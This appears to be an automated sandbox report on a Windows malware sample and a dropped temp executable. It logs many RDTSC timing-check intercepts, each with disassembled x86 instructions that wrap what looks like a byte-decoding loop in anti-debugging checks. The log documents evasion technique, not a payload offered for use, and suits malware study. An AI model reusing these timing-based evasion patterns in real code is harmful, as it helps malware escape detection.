Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe RDTSC instruction interceptor: First address: 0000000000403C92 second address: 0000000000403C98 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe RDTSC instruction interceptor: First address: 0000000000403C98 second address: 0000000000403CB7 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007FA684CEC87Dh 0x00000009 popad 0x0000000a popfd 0x0000000b mov ebx, 00403FA9h 0x00000010 pushfd 0x00000011 pushad 0x00000012 xor ecx, ecx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe RDTSC instruction interceptor: First address: 0000000000403CB7 second address: 0000000000403CBD instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe RDTSC instruction interceptor: First address: 0000000000403CBD second address: 0000000000403FB0 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007FA684CEC87Fh 0x00000009 popad 0x0000000a popfd 0x0000000b call ebx 0x0000000d push ebp 0x0000000e mov ebp, esp 0x00000010 pushfd 0x00000011 pushad 0x00000012 xor ecx, ecx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe RDTSC instruction interceptor: First address: 0000000000403FB0 second address: 0000000000403FB6 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe RDTSC instruction interceptor: First address: 0000000000403FB6 second address: 0000000000403FD3 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007FA684CEC87Fh 0x00000009 popad 0x0000000a popfd 0x0000000b push ecx 0x0000000c pushfd 0x0000000d pushad 0x0000000e xor ecx, ecx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe RDTSC instruction interceptor: First address: 0000000000403FD3 second address: 0000000000403FD9 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe RDTSC instruction interceptor: First address: 0000000000403FD9 second address: 0000000000403FFC instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007FA684CEC87Fh 0x00000009 popad 0x0000000a popfd 0x0000000b mov dword ptr [ebp-04h], 00000000h 0x00000012 pushfd 0x00000013 pushad 0x00000014 xor ecx, ecx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe RDTSC instruction interceptor: First address: 0000000000403FFC second address: 0000000000404002 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe RDTSC instruction interceptor: First address: 0000000000404002 second address: 0000000000404029 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007FA684CEC883h 0x00000009 popad 0x0000000a popfd 0x0000000b mov dword ptr [ebp-04h], 00000000h 0x00000012 pushfd 0x00000013 pushad 0x00000014 xor ecx, ecx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe RDTSC instruction interceptor: First address: 0000000000404029 second address: 000000000040402F instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe RDTSC instruction interceptor: First address: 000000000040402F second address: 0000000000404109 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007FA684CEC883h 0x00000009 popad 0x0000000a popfd 0x0000000b jmp 00007FA684CEC92Ah 0x00000010 pushfd 0x00000011 pushad 0x00000012 xor ecx, ecx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe RDTSC instruction interceptor: First address: 0000000000404109 second address: 000000000040410F instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe RDTSC instruction interceptor: First address: 000000000040410F second address: 0000000000404137 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007FA684CEC87Fh 0x00000009 popad 0x0000000a popfd 0x0000000b mov ecx, dword ptr [ebp-04h] 0x0000000e cmp ecx, dword ptr [ebp+0Ch] 0x00000011 jnc 00007FA684CECA8Dh 0x00000017 pushfd 0x00000018 pushad 0x00000019 xor ecx, ecx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe RDTSC instruction interceptor: First address: 0000000000404137 second address: 000000000040413D instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe RDTSC instruction interceptor: First address: 000000000040413D second address: 0000000000404161 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007FA684CEC884h 0x00000009 popad 0x0000000a popfd 0x0000000b mov eax, dword ptr [ebp-04h] 0x0000000e pushfd 0x0000000f pushad 0x00000010 xor ecx, ecx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe RDTSC instruction interceptor: First address: 0000000000404161 second address: 0000000000404167 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe RDTSC instruction interceptor: First address: 0000000000404167 second address: 000000000040417F instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007FA684CEC879h 0x00000009 popad 0x0000000a popfd 0x0000000b xor edx, edx 0x0000000d pushfd 0x0000000e pushad 0x0000000f xor ecx, ecx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe RDTSC instruction interceptor: First address: 000000000040417F second address: 0000000000404185 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe RDTSC instruction interceptor: First address: 0000000000404185 second address: 00000000004041A9 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007FA684CEC884h 0x00000009 popad 0x0000000a popfd 0x0000000b div dword ptr [ebp+14h] 0x0000000e pushfd 0x0000000f pushad 0x00000010 xor ecx, ecx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe RDTSC instruction interceptor: First address: 00000000004041A9 second address: 00000000004041AF instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe RDTSC instruction interceptor: First address: 00000000004041AF second address: 00000000004041D6 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007FA684CEC887h 0x00000009 popad 0x0000000a popfd 0x0000000b mov eax, dword ptr [ebp+10h] 0x0000000e pushfd 0x0000000f pushad 0x00000010 xor ecx, ecx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe RDTSC instruction interceptor: First address: 00000000004041D6 second address: 00000000004041DC instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe RDTSC instruction interceptor: First address: 00000000004041DC second address: 00000000004041F9 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007FA684CEC87Ch 0x00000009 popad 0x0000000a popfd 0x0000000b movsx ecx, byte ptr [eax+edx] 0x0000000f pushfd 0x00000010 pushad 0x00000011 xor ecx, ecx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe RDTSC instruction interceptor: First address: 00000000004041F9 second address: 00000000004041FF instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe RDTSC instruction interceptor: First address: 00000000004041FF second address: 0000000000404223 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007FA684CEC884h 0x00000009 popad 0x0000000a popfd 0x0000000b mov edx, dword ptr [ebp+08h] 0x0000000e pushfd 0x0000000f pushad 0x00000010 xor ecx, ecx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe RDTSC instruction interceptor: First address: 0000000000404223 second address: 0000000000404229 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe RDTSC instruction interceptor: First address: 0000000000404229 second address: 0000000000404245 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007FA684CEC87Ch 0x00000009 popad 0x0000000a popfd 0x0000000b add edx, dword ptr [ebp-04h] 0x0000000e pushfd 0x0000000f pushad 0x00000010 xor ecx, ecx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe RDTSC instruction interceptor: First address: 0000000000404245 second address: 000000000040424B instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe RDTSC instruction interceptor: First address: 000000000040424B second address: 000000000040426A instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007FA684CEC87Fh 0x00000009 popad 0x0000000a popfd 0x0000000b movzx eax, byte ptr [edx] 0x0000000e pushfd 0x0000000f pushad 0x00000010 xor ecx, ecx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe RDTSC instruction interceptor: First address: 000000000040426A second address: 0000000000404270 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe RDTSC instruction interceptor: First address: 0000000000404270 second address: 000000000040428F instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007FA684CEC880h 0x00000009 popad 0x0000000a popfd 0x0000000b sub eax, ecx 0x0000000d pushfd 0x0000000e pushad 0x0000000f xor ecx, ecx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe RDTSC instruction interceptor: First address: 000000000040428F second address: 0000000000404295 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe RDTSC instruction interceptor: First address: 0000000000404295 second address: 00000000004042B3 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007FA684CEC87Eh 0x00000009 popad 0x0000000a popfd 0x0000000b mov ecx, dword ptr [ebp+08h] 0x0000000e pushfd 0x0000000f pushad 0x00000010 xor ecx, ecx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe RDTSC instruction interceptor: First address: 00000000004042B3 second address: 00000000004042B9 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe RDTSC instruction interceptor: First address: 00000000004042B9 second address: 00000000004042D8 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007FA684CEC87Fh 0x00000009 popad 0x0000000a popfd 0x0000000b add ecx, dword ptr [ebp-04h] 0x0000000e pushfd 0x0000000f pushad 0x00000010 xor ecx, ecx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe RDTSC instruction interceptor: First address: 00000000004042D8 second address: 00000000004042DE instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe RDTSC instruction interceptor: First address: 00000000004042DE second address: 0000000000404300 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007FA684CEC883h 0x00000009 popad 0x0000000a popfd 0x0000000b mov byte ptr [ecx], al 0x0000000d pushfd 0x0000000e pushad 0x0000000f xor ecx, ecx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe RDTSC instruction interceptor: First address: 0000000000404300 second address: 0000000000404306 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe RDTSC instruction interceptor: First address: 0000000000404306 second address: 0000000000404079 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007FA684CEC87Fh 0x00000009 popad 0x0000000a popfd 0x0000000b jmp 00007FA684CEC5C7h 0x00000010 pushfd 0x00000011 pushad 0x00000012 xor ecx, ecx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe RDTSC instruction interceptor: First address: 0000000000404079 second address: 000000000040407F instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe RDTSC instruction interceptor: First address: 000000000040407F second address: 000000000040409B instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007FA684CEC87Ch 0x00000009 popad 0x0000000a popfd 0x0000000b mov eax, dword ptr [ebp-04h] 0x0000000e pushfd 0x0000000f pushad 0x00000010 xor ecx, ecx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe RDTSC instruction interceptor: First address: 000000000040409B second address: 00000000004040A1 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe RDTSC instruction interceptor: First address: 00000000004040A1 second address: 00000000004040C1 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007FA684CEC880h 0x00000009 popad 0x0000000a popfd 0x0000000b add eax, 01h 0x0000000e pushfd 0x0000000f pushad 0x00000010 xor ecx, ecx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe RDTSC instruction interceptor: First address: 00000000004040C1 second address: 00000000004040C7 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe RDTSC instruction interceptor: First address: 00000000004040C7 second address: 00000000004040E8 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007FA684CEC881h 0x00000009 popad 0x0000000a popfd 0x0000000b mov dword ptr [ebp-04h], eax 0x0000000e pushfd 0x0000000f pushad 0x00000010 xor ecx, ecx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe RDTSC instruction interceptor: First address: 00000000004040E8 second address: 00000000004040EE instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe RDTSC instruction interceptor: First address: 00000000004040EE second address: 0000000000404109 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007FA684CEC87Eh 0x00000009 popad 0x0000000a popfd 0x0000000b pushfd 0x0000000c pushad 0x0000000d xor ecx, ecx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe RDTSC instruction interceptor: First address: 000000000040434E second address: 0000000000404354 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe RDTSC instruction interceptor: First address: 0000000000403BD4 second address: 0000000000403BDA instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe RDTSC instruction interceptor: First address: 0000000000403BDA second address: 0000000000403BFC instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007FA684D71C53h 0x00000009 popad 0x0000000a popfd 0x0000000b push 00000005h 0x0000000d pushfd 0x0000000e pushad 0x0000000f xor ecx, ecx 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe RDTSC instruction interceptor: First address: 0000000000403BFC second address: 0000000000403C02 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe RDTSC instruction interceptor: First address: 0000000000403C02 second address: 0000000000403C23 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007FA684D71C4Fh 0x00000009 popad 0x0000000a popfd 0x0000000b mov eax, 00403F45h 0x00000010 pushfd 0x00000011 pushad 0x00000012 xor ecx, ecx 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe RDTSC instruction interceptor: First address: 0000000000403C23 second address: 0000000000403C29 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe RDTSC instruction interceptor: First address: 0000000000403C29 second address: 0000000000403C43 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007FA684D71C4Ch 0x00000009 popad 0x0000000a popfd 0x0000000b push eax 0x0000000c pushfd 0x0000000d pushad 0x0000000e xor ecx, ecx 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe RDTSC instruction interceptor: First address: 0000000000403C43 second address: 0000000000403C49 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe RDTSC instruction interceptor: First address: 0000000000403C49 second address: 0000000000403C6C instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007FA684D71C51h 0x00000009 popad 0x0000000a popfd 0x0000000b push 000013C5h 0x00000010 pushfd 0x00000011 pushad 0x00000012 xor ecx, ecx 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe RDTSC instruction interceptor: First address: 0000000000403C6C second address: 0000000000403C72 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe RDTSC instruction interceptor: First address: 0000000000403C72 second address: 0000000000403C92 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007FA684D71C4Eh 0x00000009 popad 0x0000000a popfd 0x0000000b push 00404779h 0x00000010 pushfd 0x00000011 pushad 0x00000012 xor ecx, ecx 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe RDTSC instruction interceptor: First address: 0000000000403C92 second address: 0000000000403C98 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe RDTSC instruction interceptor: First address: 0000000000403C98 second address: 0000000000403CB7 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007FA684D71C4Dh 0x00000009 popad 0x0000000a popfd 0x0000000b mov ebx, 00403FA9h 0x00000010 pushfd 0x00000011 pushad 0x00000012 xor ecx, ecx 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe RDTSC instruction interceptor: First address: 0000000000403CB7 second address: 0000000000403CBD instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe RDTSC instruction interceptor: First address: 0000000000403CBD second address: 0000000000403FB0 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007FA684D71C4Fh 0x00000009 popad 0x0000000a popfd 0x0000000b call ebx 0x0000000d push ebp 0x0000000e mov ebp, esp 0x00000010 pushfd 0x00000011 pushad 0x00000012 xor ecx, ecx 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe RDTSC instruction interceptor: First address: 0000000000403FB0 second address: 0000000000403FB6 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe RDTSC instruction interceptor: First address: 0000000000403FB6 second address: 0000000000403FD3 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007FA684D71C4Fh 0x00000009 popad 0x0000000a popfd 0x0000000b push ecx 0x0000000c pushfd 0x0000000d pushad 0x0000000e xor ecx, ecx 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe RDTSC instruction interceptor: First address: 0000000000403FD3 second address: 0000000000403FD9 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe RDTSC instruction interceptor: First address: 0000000000403FD9 second address: 0000000000403FFC instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007FA684D71C4Fh 0x00000009 popad 0x0000000a popfd 0x0000000b mov dword ptr [ebp-04h], 00000000h 0x00000012 pushfd 0x00000013 pushad 0x00000014 xor ecx, ecx 0x00000016 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe RDTSC instruction interceptor: First address: 0000000000403FFC second address: 0000000000404002 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe RDTSC instruction interceptor: First address: 0000000000404002 second address: 0000000000404029 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007FA684D71C53h 0x00000009 popad 0x0000000a popfd 0x0000000b mov dword ptr [ebp-04h], 00000000h 0x00000012 pushfd 0x00000013 pushad 0x00000014 xor ecx, ecx 0x00000016 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe RDTSC instruction interceptor: First address: 0000000000404029 second address: 000000000040402F instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe RDTSC instruction interceptor: First address: 000000000040402F second address: 0000000000404109 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007FA684D71C53h 0x00000009 popad 0x0000000a popfd 0x0000000b jmp 00007FA684D71CFAh 0x00000010 pushfd 0x00000011 pushad 0x00000012 xor ecx, ecx 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe RDTSC instruction interceptor: First address: 0000000000404109 second address: 000000000040410F instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe RDTSC instruction interceptor: First address: 000000000040410F second address: 0000000000404137 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007FA684D71C4Fh 0x00000009 popad 0x0000000a popfd 0x0000000b mov ecx, dword ptr [ebp-04h] 0x0000000e cmp ecx, dword ptr [ebp+0Ch] 0x00000011 jnc 00007FA684D71E5Dh 0x00000017 pushfd 0x00000018 pushad 0x00000019 xor ecx, ecx 0x0000001b rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe RDTSC instruction interceptor: First address: 0000000000404137 second address: 000000000040413D instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe RDTSC instruction interceptor: First address: 000000000040413D second address: 0000000000404161 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007FA684D71C54h 0x00000009 popad 0x0000000a popfd 0x0000000b mov eax, dword ptr [ebp-04h] 0x0000000e pushfd 0x0000000f pushad 0x00000010 xor ecx, ecx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe RDTSC instruction interceptor: First address: 0000000000404161 second address: 0000000000404167 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe RDTSC instruction interceptor: First address: 0000000000404167 second address: 000000000040417F instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007FA684D71C49h 0x00000009 popad 0x0000000a popfd 0x0000000b xor edx, edx 0x0000000d pushfd 0x0000000e pushad 0x0000000f xor ecx, ecx 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe RDTSC instruction interceptor: First address: 000000000040417F second address: 0000000000404185 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe RDTSC instruction interceptor: First address: 0000000000404185 second address: 00000000004041A9 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007FA684D71C54h 0x00000009 popad 0x0000000a popfd 0x0000000b div dword ptr [ebp+14h] 0x0000000e pushfd 0x0000000f pushad 0x00000010 xor ecx, ecx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe RDTSC instruction interceptor: First address: 00000000004041A9 second address: 00000000004041AF instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe RDTSC instruction interceptor: First address: 00000000004041AF second address: 00000000004041D6 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007FA684D71C57h 0x00000009 popad 0x0000000a popfd 0x0000000b mov eax, dword ptr [ebp+10h] 0x0000000e pushfd 0x0000000f pushad 0x00000010 xor ecx, ecx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe RDTSC instruction interceptor: First address: 00000000004041D6 second address: 00000000004041DC instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe RDTSC instruction interceptor: First address: 00000000004041DC second address: 00000000004041F9 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007FA684D71C4Ch 0x00000009 popad 0x0000000a popfd 0x0000000b movsx ecx, byte ptr [eax+edx] 0x0000000f pushfd 0x00000010 pushad 0x00000011 xor ecx, ecx 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe RDTSC instruction interceptor: First address: 00000000004041F9 second address: 00000000004041FF instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
